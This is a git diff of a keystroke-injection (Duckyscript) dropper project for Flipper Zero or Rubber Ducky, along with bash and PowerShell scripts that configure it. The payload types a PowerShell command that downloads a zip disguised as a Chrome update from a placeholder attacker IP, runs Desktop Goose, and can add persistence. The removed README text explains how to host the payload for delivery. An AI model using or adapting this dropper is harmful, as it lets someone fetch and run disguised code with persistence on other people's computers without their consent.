diff --git a/Duckyscripts/GooseDropper/GooseDropper.txt b/Duckyscripts/GooseDropper/GooseDropper.txt index e1c50d2..066fd82 100644 --- a/Duckyscripts/GooseDropper/GooseDropper.txt +++ b/Duckyscripts/GooseDropper/GooseDropper.txt @@ -4,7 +4,7 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r DELAY 500 GUI r DELAY 500 -STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip +STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip ENTER DELAY 8000 GUI r diff --git a/Duckyscripts/GooseDropper/README.md b/Duckyscripts/GooseDropper/README.md index 5192d5c..c10a4c3 100644 --- a/Duckyscripts/GooseDropper/README.md +++ b/Duckyscripts/GooseDropper/README.md @@ -2,23 +2,6 @@ This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE** ------------------------------------------------------------------------------------------------------- - ------------------------------------------------------------------------------------------------------- - -Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually: - - 1) Replace the YOUR_IP value in GooseDropper.txt with your IP. - - 2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update. - - 3) Copy PersistentGoose.ps1 into the newly renamed Update folder. - - 4) Re-ZIP the Update directory and name it Chrome_Updater. - - 5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice). - - 6) Copy to your Flipper or Rubber-Ducky and PWN! -------------------------------------------------------------------------------------------------------------- **Important Notes:** @@ -34,3 +17,9 @@ All credit goes to Samperson for the development of Desktop Goose: https://itch. Revamped updater with more options and better dialogue. Bugfixes to ensure payloads get delivered successfully. + +**=== v2.1 Notes ==** + + Simplified configurators to remove unnecessary complexity + + Added Windows auto-configuration tool. diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 36263ef..c6f5637 100644 --- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -1,90 +1,31 @@ #!/bin/bash -#Determine the source of the DesktopGoose download -echo "1) Local Webserver | 2) Persistant URL" +IP=$1 +ZIP=$2 +PERSIST=$3 -read -p "Select a download source [1/2]: " DL - -if [ "${DL}" == "1" ]; +#Ensure required arguments are not empty +if [ "${IP}" == "" ] | [ "${ZIP}" == "" ]; then - echo "Grabbing your IP" - - #Grab your local IP to add to the payload - SRC="$(ip route show | grep default | cut -d ' ' -f 9)" - - #Add your IP to the payload - sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt - - sleep 5s && clear - -elif [ "${DL}" == "2" ]; -then - #Get your URL - read -p "Enter your URL: " SRC - SRC="$(echo "$SRC" | sed 's/\//\\\//g')" - #Add your URL to the payload - sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt - - #Remind users to have the zip ready - echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL" - - sleep 5s && clear - -else - echo "Please enter a valid selection" - exit - + echo "Usage: sh linux_setup.sh " + exit fi -read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP - -#Check if Desktop Goose is present in this directory -GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" - -if [ "${COMP,,}" == "y" ]; +#Check for help command +if [ "${IP,,}" == "-h" ] | [ "${IP,,}" == "help" ]; then - - if [ "${GOOSE}" == "" ]; - then - echo "Desktop Goose is not present in this directory, download it, or move it here" - exit - - else - unzip "Desktop Goose v0.31.zip" - mv "Desktop Goose v0.31/DesktopGoose v0.31" Update - mv PersistentGoose.ps1 Update/ - zip -r Chrome_Update.zip Update - rm -rf "Desktop Goose v0.31"* Update - clear - fi -else - break + echo "Usage: sh linux_setup.sh " + exit fi -read -p "Configure Persistence? [Y/N]: " PERSIST +#Replace placeholders with provided values +sed -i "s/YOUR_IP/$IP/" GooseDropper.txt +sed -i "s/ZIP/$ZIP/" GooseDropper.txt +#Remove persistance if desired if [ "${PERSIST,,}" == "n" ]; then sed -i "15d;16d;17d;18d;19d" GooseDropper.txt else break fi - -if [ "${DL}" == "1" ]; -then - clear - read -p "Configuration finished! Start python webserver now? [Y/N]: " START - clear -else - clear - break -fi - -if [ "${START,,}" == "y" ]; -then - echo "Starting Server... Happy PWNing! (don't be a skid)" - python3 -m http.server 1337 && echo "PWNED!" -else - clear - echo "Finished... Happy PWNing! (don't be a skid)!" -fi diff --git a/Duckyscripts/GooseDropper/windows_setup.ps1 b/Duckyscripts/GooseDropper/windows_setup.ps1 new file mode 100644 index 0000000..de66ccf --- /dev/null +++ b/Duckyscripts/GooseDropper/windows_setup.ps1 @@ -0,0 +1,30 @@ +param ( + [string]$HELP, + [string]$IP, + [string]$ZIP, + [string]$PERSIST +) + +# Ensure required arguments are not empty +if (-not $IP -or -not $ZIP) { + Write-Host "Usage: .\windows_setup.ps1 " + exit +} + +# Check for help command +if ($HELP) { + Write-Host "Usage: .\windows_setup.ps1 " + exit +} + +# Replace placeholders with provided values +(Get-Content "GooseDropper.txt") | ForEach-Object { $_ -replace 'YOUR_IP', $IP -replace 'ZIP', $ZIP } | Set-Content "GooseDropper.txt" + +# Remove persistence if desired +if ($PERSIST.ToLower() -eq "n") { + $lines = Get-Content "GooseDropper.txt" + $lines = $lines[0..14] + $lines[19..($lines.Length - 1)] + Set-Content "GooseDropper.txt" $lines +} else { + break +}